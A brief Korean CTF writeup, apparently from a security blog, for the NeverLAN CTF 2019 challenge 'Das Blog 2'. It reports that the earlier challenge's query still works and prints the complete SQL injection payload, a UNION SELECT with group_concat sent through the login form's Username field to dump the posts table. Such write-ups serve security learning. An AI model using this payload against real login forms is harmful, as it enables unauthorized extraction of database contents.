White Security
neverlanctf 2019 - Das Blog 2 writeup 본문
Das Blog 에서 개선된 문제라고 합니다.
이전과 마찬가지로 로그인 페이지가
존재하는 것을 볼 수 있습니다.
폼도 동일하고
심지어 완전히 같은 쿼리로
플래그를 얻어낼 수 있었습니다.
submit=Login&Password=&Username=' union select group_concat(0xa,a,0x3a,b),2 from (select title a,content as b from posts)x;%00
'CTF Writups' 카테고리의 다른 글
| neverlanctf 2019 - purvesta writeup (0) | 2019.02.04 |
|---|---|
| neverlanctf 2019 - Dirty Validate writeup (0) | 2019.02.04 |
| neverlanctf 2019 - Das Blog writeup (0) | 2019.02.04 |
| neverlanctf 2019 - Cover the BASEs writeup (0) | 2019.02.04 |
| neverlanctf 2019 - Cookie monster writeup (0) | 2019.02.04 |
'CTF Writups' Related Articles
more
Comments